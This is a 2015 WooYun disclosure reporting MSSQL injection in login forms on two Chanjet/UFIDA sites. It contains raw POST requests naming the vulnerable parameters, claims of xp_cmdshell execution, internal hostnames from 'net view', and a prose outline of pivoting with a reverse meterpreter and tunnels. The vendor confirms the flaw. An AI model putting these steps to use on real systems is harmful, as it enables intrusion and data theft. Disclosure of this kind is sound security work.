当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113960

漏洞标题:畅捷通某ip上多个站点mssql注入可os-shell

相关厂商:畅捷通

漏洞作者: myhalo

提交时间:2015-05-14 10:01

修复时间:2015-06-28 16:24

公开时间:2015-06-28 16:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-14: 细节已通知厂商并且等待厂商处理中
2015-05-14: 厂商已经确认,细节仅向厂商公开
2015-05-24: 细节向核心白帽子及相关领域专家公开
2015-06-03: 细节向普通白帽子公开
2015-06-13: 细节向实习白帽子公开
2015-06-28: 细节向公众公开

简要描述:

同ip下多个站点存在注入、
mssql的DBA权限、
发现可xp_cmdshell、

详细说明:

无意中发现畅捷通某站点http://pjmini.chanjet.com、正面拿不下来,于是旁注了下。

0.png


0x1首页:http://udp.ufida.com.cn/utilityOnline.asp

1.png


点击登录、然后用户名出存在POST注入:

2.jpg


3.png


然后抓下包:
POST /userLogincl.asp HTTP/1.1
Host: udp.ufida.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://udp.ufida.com.cn/userLogin.asp
Cookie: ASPSESSIONIDQSDRTQCB=DGDNMPIBBIAOPLFACJPHMFMH; Hm_lvt_f5127c6793d40d199f68042b8a63e725=1431512083; Hm_lpvt_f5127c6793d40d199f68042b8a63e725=1431512083
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
uid=admin&pwd=admin&cYZM=1161&x=42&y=18

4.png


由于是mssql,一般我都喜欢先试试能不能直接xp_cmdshell、

5.png


全程无压力的执行了命令、
net view一下、
服务器名称 注释
\\DB2ADMIN db2admin
\\GBUFWZB_10_30
\\GZW04 GZW04
\\GZW05 GZW05
\\KHSERVER server
\\PITSERVER
\\SSED-05A7B0F6CE
\\TONG_VM3
\\TONG_VM4
\\U6DMP01
\\U9ZZKF2B
\\UDP_01
\\UDP_02
\\UF10100454
\\UF1010412
\\UF1010419
\\UF200802369
\\UF201002486
\\UFFFFFF-98B13TT
\\UFIDA-AC3C09E2E
\\UFIDAHEALTH-201
\\WIN-0TDD31NUDHE
\\WIN-4CGOO2TJALU
\\WIN-7J707BVCTBP
\\WIN-7O8QOJ2DLNQ
\\WIN-7SI1PR5UF2T
\\WIN-7VTSPBM3NLG
\\WIN-9TO7HD94CRD
\\WIN-G139RFPUQN9
\\WIN-HDBSG5DLD2P
\\WIN-HPM6KNPAMKD
\\WIN-J4VIR70S5CV
\\WIN-K556IT7CEP3
\\WIN-LEQQER457U6
\\WIN-OJ4Q40V3O0P
\\WIN-P6G4HRCL8HK
\\WIN-RCNTTFC09BE
\\WIN-ST8AEX0LXFP
\\WIN-TL4HHEUEF5D
\\WIN-TQF3OAHSH3A
\\WIN-U89VOHJOFEJ
\\YL1010421
\\YONYOU-0E970C6B

6.png


数据库也挺多的、
0x2、http://u6dmp.ufida.com.cn/newindex.asp

7.jpg


这里同样的一个POST注入、
POST /newclindex11.asp HTTP/1.1
Host: u6dmp.ufida.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://u6dmp.ufida.com.cn/newindex.asp
Cookie: ASPSESSIONIDQQDSQTDB=BNLPOPHBLELOKDMKDKMEECCA; Hm_lvt_f5127c6793d40d199f68042b8a63e725=1431513918; Hm_lpvt_f5127c6793d40d199f68042b8a63e725=1431513918
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
cName=admin&cPass=admin&Submit=%B5%C7+%C2%BD

9.png


11.png


有是一大堆的裤子、

8.png


这样的话就弄到两个内网的机器了、可内网渗透。

漏洞证明:

6.png


11.png


8.png


这里顺带说一下,可以内网渗透,利用os-pwn传一个metasploit的马上去获取一个meterpreter、然后就xxoo,因为这里你们那边是内网,用bind会比较麻烦,所以得用reverse、我学校内网得穿4个路由更加不现实、但是可以利用os-shell翻下目录,写个tunnel上去、做个web代理。但是要把内网的某个服务器的ip转发出来同样需要一个公网ip,然后就到此为止吧,肉鸡上弄也麻烦、

修复方案:

0x1、对参数过滤、
0x2、排查下webshell、后门之类的、
危害挺大的,求高rank、和小礼物呀、

版权声明:转载请注明来源 myhalo@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-14 16:23

厂商回复:

感谢您对我们的关注和支持,该问题存在,我们正在修复。

最新状态:

暂无